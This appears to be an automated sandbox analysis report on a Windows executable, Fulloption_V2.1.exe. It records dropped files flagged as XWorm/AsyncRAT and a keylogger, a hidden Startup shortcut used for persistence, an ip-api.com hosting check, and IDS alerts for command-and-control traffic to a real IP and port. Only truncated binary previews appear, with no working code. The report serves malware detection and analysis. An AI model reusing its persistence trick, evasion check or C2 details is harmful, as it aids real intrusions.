SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmfcoaaw.gnq.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inp3lahv.cnd.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhrc3s11.3id.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jykicnug.yyi.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o35e3weu.0gv.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ok5n1vgm.m3i.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quescxip.gbd.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yo1g1c0h.gx4.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

Process:	C:\Users\user\Desktop\Fulloption_V2.1.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4065792
Entropy (8bit):	7.424835087460422
Encrypted:	false
SSDEEP:	49152:2cJxbsVO7Px8CBHIx5zosKv+gBQtnFfPq2IPF1QSO23dwoQB1cBYATrxl0czt:2cXsOKCdI9cf28F1QSbtwPalNl02
MD5:	2F6E9C0DD1C6859A9D6E7ACEA1DB9AC0
SHA1:	B0DCD2BE62B6A559E479DE7745AB0988B8B30522
SHA-256:	122E3CB0F2AD233D1A364911D433667E7778F00D9A7D10B954C994F4E8093D1F
SHA-512:	FE3634F46AFD5B45F0FFC721A18B5EF1B1344B548F90B8C54EA6995E3D64B7394B56C681B1A0522B67E862FCE9D8333B621612A2F03708E7DBC917A28C58C15D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Joe Sandbox View:	Filename: 4QnTBz8fN3.exe, Detection: malicious, Browse
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........#V7_B8d_B8d_B8dV:.dIB8dO..dVB8dO.;e[B8dO.<eUB8dO.=ewB8dO.9eYB8d.2<e6B8d.><e]B8d.>=e]B8d.;<eEB8d.:>e^B8d.:9e{B8d...dVB8d_B9d\|@8d..1eNB8d...d^B8d..:e^B8dRich_B8d........................PE..d...[1.f.........."....).....,(................@..............................>...........`.................................................@l.......@>......`=..............P>.P"......p.......................(...`...@............0..(............................text............................... ..`.rdata...u...0...v..................@..@.data.....!......t!.................@....pdata.......`=.......=.............@..@.rsrc........@>.......=.............@..@.reloc..P"...P>..$....=.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 20 08:38:07 2024, mtime=Wed Nov 20 08:38:07 2024, atime=Wed Nov 20 08:38:07 2024, length=75264, window=hide
Category:	dropped
Size (bytes):	663
Entropy (8bit):	4.585591701388686
Encrypted:	false
SSDEEP:	12:8ot/sscl5IH9AbelVsTCEjAPciIsbdiwB99n9BmV:84/GwAbmsTCQAkkdFB9R9Bm
MD5:	A5A7340F991BCC486C72D6D7E456BAE3
SHA1:	22C6F9A149B4D3143D743F757BE61DCB3AB87ECA
SHA-256:	878817F167EEA7920B6E29FE4EAFB86CCB1F93064A99546CB5BB9DD0E432B507
SHA-512:	9CB6062694B24D3D1E45E011D8A3694581FAFF7EDA865EF997A23F441F56B38D93B0A67D2D2EFC568B3D5C827553AB659F5C9CD00642B80C815E961DAFA02F42
Malicious:	false
Preview:	L..................F.... ..#1../;..#1../;..#1../;...&...........................P.O. .:i.....+00.../C:\...................`.1.....tY.L. PROGRA~3..H......O.ItY.L....g......................]v.P.r.o.g.r.a.m.D.a.t.a.....b.2..&..tY.L svchost.exe.H......tY.LtY.L....!......................N..s.v.c.h.o.s.t...e.x.e.......I...............-.......H...........6..&.....C:\ProgramData\svchost.exe..2.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.s.v.c.h.o.s.t...e.x.e.`.......X.......721680...........hT..CrF.f4... ..W@.#....-...-$..hT..CrF.f4... ..W@.#....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\svchost.exe

Process:	C:\Users\user\Desktop\Fulloption_V2.1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	75264
Entropy (8bit):	5.976607627301734
Encrypted:	false
SSDEEP:	1536:jSJd0NZZ4CuyMAa70b36MJP6ROuEn9i8:+J3C1ba70b3xYOuEn48
MD5:	12B722899C9A6B517D52B8DE2C7C3E2E
SHA1:	A92DBC8EDD02ADEEAB5FA9C0E2A884A84A315FE5
SHA-256:	57EC7BCA087DD678BEF5AEAAA52F4F393D63613976701E6A111015FB7F9F1B6C
SHA-512:	F7B56B96A2DCDA223668D82BC8DD7C5A0E7E5786AACAD6A0BEC809E8525E383B9A85F9E834CF29636FCDB84CCE97CF4AD996F9D2CC827C189A2C06BAEC661A53
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(g.............................;... ...@....@.. ....................................@.................................p;..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H........c..X.......&.....................................................(.....r...p. ......(.....rA..p. S....s.........s.........s.........s..........r...p. .....r...p. ..e..r...p. E/...rA..p. .q...r...p. ......((....r...p.r...p. p{..(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+.&(....&+..+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-..r...p. ....r_..p. ^....r...p. .....r...p.r...p.r_..p. z....r...p.r...p. O....r..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.965324524688038
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Fulloption_V2.1.exe
File size:	4'400'640 bytes
MD5:	9f53cc8bc6cb459cb3c5ccc0d54812d6
SHA1:	f18cda32845d3daecf694457a92f614931695c50
SHA256:	aa1a013b0b9dba1edcac0096c8bd847cf50126cc719e5ec8e1d7311ef37b97f8
SHA512:	0047d8a7035148466f6b52ff7c9ea85d72075bbcda891192aedef0e2c2a18e1f90697cef7b5f5558a973e5214d754b483da2f35331974a521f7dbab5391c562a
SSDEEP:	98304:0er3mJdJ0Gz+yQ3zkgHC3lD1qhPEeXkZGRaGxOJx1/qV:JSJdJrz+yOkg8BQPfXYoI1q
TLSH:	D71601E15A22BB47D2B5B77AD738D2033D049863E723545C2FF09380A939C19EF695E8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.(g.................b?.........>.?.. ....?...@.. ........................C...........@................................

File Icon


Icon Hash:	464028d6d4891906

Static PE Info

General

Entrypoint:	0x7f803e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67280634 [Sun Nov 3 23:24:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3f7fe4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3fa000	0x3beac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x436000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3f6044	0x3f6200	935e2aa74ff27ebcd43bab69a763bf17	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x3fa000	0x3beac	0x3c000	f446811a2582163097c3fa2a19689a39	False	0.23304036458333333	data	4.4905023746631985	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x436000	0xc	0x200	594615387619187b33b96dd2e7366c0f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x3fa130	0x3b908	Device independent bitmap graphic, 256 x 462 x 32, image size 236544	0.23174410597763714
RT_GROUP_ICON	0x435a38	0x14	data	1.1
RT_VERSION	0x435a4c	0x274	data	0.4538216560509554
RT_MANIFEST	0x435cc0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-20T10:38:26.386907+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:38:26.607517+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.6	49986	45.141.27.248	7777	TCP
2024-11-20T10:38:30.152640+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:38:30.152640+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:38:38.929759+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:38:38.931580+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.6	49986	45.141.27.248	7777	TCP
2024-11-20T10:38:51.230589+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:38:51.232720+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.6	49986	45.141.27.248	7777	TCP
2024-11-20T10:39:00.150444+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:39:00.150444+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:39:03.593725+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:39:03.595756+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.6	49986	45.141.27.248	7777	TCP
2024-11-20T10:39:14.007694+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.27.248	7777	192.168.2.6	49986	TCP
2024-11-20T10:39:14.008600+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.6	49986	45.141.27.248	7777	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 10:37:11.484632015 CET	49711	80	192.168.2.6	208.95.112.1
Nov 20, 2024 10:37:11.489640951 CET	80	49711	208.95.112.1	192.168.2.6
Nov 20, 2024 10:37:11.489721060 CET	49711	80	192.168.2.6	208.95.112.1
Nov 20, 2024 10:37:11.490232944 CET	49711	80	192.168.2.6	208.95.112.1
Nov 20, 2024 10:37:11.495208979 CET	80	49711	208.95.112.1	192.168.2.6
Nov 20, 2024 10:37:11.957405090 CET	80	49711	208.95.112.1	192.168.2.6
Nov 20, 2024 10:37:12.005644083 CET	49711	80	192.168.2.6	208.95.112.1
Nov 20, 2024 10:38:13.517193079 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:13.522862911 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:13.522947073 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:13.566546917 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:13.571517944 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:21.447602987 CET	80	49711	208.95.112.1	192.168.2.6
Nov 20, 2024 10:38:21.447788954 CET	49711	80	192.168.2.6	208.95.112.1
Nov 20, 2024 10:38:25.946774006 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:25.953778028 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:26.386907101 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:26.427795887 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:26.607517004 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:26.612369061 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:30.152640104 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:30.193418026 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:38.334481001 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:38.340311050 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:38.929759026 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:38.931580067 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:38.941502094 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:50.725512028 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:50.731092930 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:51.230588913 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:51.232719898 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:38:51.240078926 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:38:51.976311922 CET	49711	80	192.168.2.6	208.95.112.1
Nov 20, 2024 10:38:51.981411934 CET	80	49711	208.95.112.1	192.168.2.6
Nov 20, 2024 10:39:00.150444031 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:39:00.193516970 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:39:03.115813017 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:39:03.121007919 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:39:03.593724966 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:39:03.595756054 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:39:03.601629019 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:39:13.522186995 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:39:13.528578997 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:39:14.007694006 CET	7777	49986	45.141.27.248	192.168.2.6
Nov 20, 2024 10:39:14.008599997 CET	49986	7777	192.168.2.6	45.141.27.248
Nov 20, 2024 10:39:14.017343998 CET	7777	49986	45.141.27.248	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 10:37:11.470412970 CET	64137	53	192.168.2.6	1.1.1.1
Nov 20, 2024 10:37:11.479039907 CET	53	64137	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 10:37:11.470412970 CET	192.168.2.6	1.1.1.1	0xaaa1	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 10:37:11.479039907 CET	1.1.1.1	192.168.2.6	0xaaa1	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	208.95.112.1	80	4000	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:37:11.490232944 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 20, 2024 10:37:11.957405090 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:37:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 56 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Target ID:	0
Start time:	04:37:05
Start date:	20/11/2024
Path:	C:\Users\user\Desktop\Fulloption_V2.1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Fulloption_V2.1.exe"
Imagebase:	0xb40000
File size:	4'400'640 bytes
MD5 hash:	9F53CC8BC6CB459CB3C5CCC0D54812D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	04:37:06
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
Imagebase:	0x7ff6ae6d0000
File size:	4'065'792 bytes
MD5 hash:	2F6E9C0DD1C6859A9D6E7ACEA1DB9AC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
